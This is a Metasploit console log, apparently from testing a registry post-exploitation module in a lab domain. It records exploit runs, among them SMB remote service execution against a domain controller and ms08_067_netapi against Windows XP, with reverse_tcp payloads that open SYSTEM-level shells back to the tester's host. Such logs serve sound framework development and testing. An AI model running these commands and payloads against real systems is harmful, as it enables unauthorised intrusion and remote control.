[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Session ID 2 (192.168.159.128:4444 -> 192.168.159.10:56502) processing AutoRunScript 'post/test/registry'
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: powershell
[*] Running against session 2
[*] Session type is powershell and platform is windows
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[-] FAILED: should write REG_SZ unicode values
[+] should delete unicode keys
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[-] Passed: 15; Failed: 1
[*] Powershell session session 2 opened (192.168.159.128:4444 -> 192.168.159.10:56502) at 2022-09-08 13:24:04 -0400
[*] Session 2 created in the background.
resource (test.rc)> set TARGET Automatic
TARGET => Automatic
resource (test.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (test.rc)> set LHOST 192.168.159.128
LHOST => 192.168.159.128
resource (test.rc)> exploit -z
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.159.10:445 - PowerShell found
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Powershell command length: 4507
[*] 192.168.159.10:445 - Executing the payload...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[*] Sending stage (200774 bytes) to 192.168.159.10
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Session ID 3 (192.168.159.128:4444 -> 192.168.159.10:56503) processing AutoRunScript 'post/test/registry'
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: meterpreter
[*] Running against session 3
[*] Session type is meterpreter and platform is windows
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[+] should write REG_SZ unicode values
[+] should delete unicode keys
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[*] Passed: 16; Failed: 0
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.10:56503) at 2022-09-08 13:24:13 -0400
[*] Session 3 created in the background.
resource (test.rc)> set TARGET Command
TARGET => Command
resource (test.rc)> set PAYLOAD cmd/windows/python/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/python/meterpreter/reverse_tcp
resource (test.rc)> set LHOST 192.168.159.128
LHOST => 192.168.159.128
resource (test.rc)> exploit -z
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Executing the command...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[*] Sending stage (40164 bytes) to 192.168.159.10
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Session ID 4 (192.168.159.128:4444 -> 192.168.159.10:56504) processing AutoRunScript 'post/test/registry'
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: meterpreter
[!]  * missing Meterpreter features: stdapi_sys_config_getprivs
[*] Running against session 4
[*] Session type is meterpreter and platform is windows
[+] should create keys
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] should write REG_BINARY values
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[+] should write REG_SZ unicode values
[+] should delete unicode keys
[*] 192.168.159.10:445 - Checking if the file is unlocked...
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[+] should return normalized values
[+] should enumerate keys and values
[*] Passed: 16; Failed: 0
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.10:56504) at 2022-09-08 13:24:19 -0400
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\SqGpukRPqKGEEawE.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful
[*] Session 4 created in the background.
resource (test.rc)> use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/shell/reverse_tcp
resource (test.rc)> set RHOST 192.168.159.113
RHOST => 192.168.159.113
resource (test.rc)> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource (test.rc)> set AutoRunScript post/test/registry
AutoRunScript => post/test/registry
resource (test.rc)> exploit -z
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.113:445 - Automatically detecting the target...
[*] 192.168.159.113:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.159.113:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.159.113:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.159.113
[*] Session ID 5 (192.168.159.128:4444 -> 192.168.159.113:1056) processing AutoRunScript 'post/test/registry'
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: shell
[*] Running against session 5
[*] Session type is shell and platform is windows
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[-] FAILED: should write REG_SZ unicode values
[+] should delete unicode keys
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[*] SKIPPED: should read values with a 32-bit view (the target does not support non-native views)
[+] should read values with a 32-bit view
[*] SKIPPED: should read values with a 64-bit view (the target does not support non-native views)
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[-] Passed: 15; Failed: 1
[*] Command shell session 5 opened (192.168.159.128:4444 -> 192.168.159.113:1056) at 2022-09-08 13:24:29 -0400
[*] Session 5 created in the background.
resource (test.rc)> sessions

Active sessions
===============

  Id  Name  Type                        Information                                                                      Connection
  --  ----  ----                        -----------                                                                      ----------
  1         shell x64/windows           Shell Banner: Microsoft Windows [Version 10.0.17763.3232] -----                  192.168.159.128:4444 -> 192.168.159.10:56500 (192.168.159.10)
  2         powershell windows          Shell Banner: Windows PowerShell running as user DC$ on DC Copyright (C) Mic...  192.168.159.128:4444 -> 192.168.159.10:56502 (192.168.159.10)
  3         meterpreter x64/windows     NT AUTHORITY\SYSTEM @ DC                                                         192.168.159.128:4444 -> 192.168.159.10:56503 (192.168.159.10)
  4         meterpreter python/windows  NT AUTHORITY\SYSTEM @ DC                                                         192.168.159.128:4444 -> 192.168.159.10:56504 (192.168.159.10)
  5         shell x86/windows           Shell Banner: Microsoft Windows XP [Version 5.1.2600] -----                      192.168.159.128:4444 -> 192.168.159.113:1056 (192.168.159.113)

msf6 exploit(windows/smb/ms08_067_netapi) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > reg setval -k HKLM\\Software\\Testing -t REG_MULTI_SZ -v "test_multi" -d "line1\0line2\0line3"
Successfully set test_multi of REG_MULTI_SZ.
meterpreter > reg queryval -k HKLM\\Software\\Testing -t REG_MULTI_SZ -v "test_multi"
Key: HKLM\Software\Testing
Name: test_multi
Type: REG_MULTI_SZ
Data: line1\0line2\0line3
meterpreter > background 
[*] Backgrounding session 3...
msf6 exploit(windows/smb/ms08_067_netapi) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > reg setval -k HKLM\\Software\\Testing -t REG_MULTI_SZ -v "test_multi2" -d "line1\0line2\0line3"
Successfully set test_multi2 of REG_MULTI_SZ.
meterpreter > reg queryval -k HKLM\\Software\\Testing -t REG_MULTI_SZ -v "test_multi2"
Key: HKLM\Software\Testing
Name: test_multi2
Type: REG_MULTI_SZ
Data: line1\0line2\0line3
meterpreter >
```
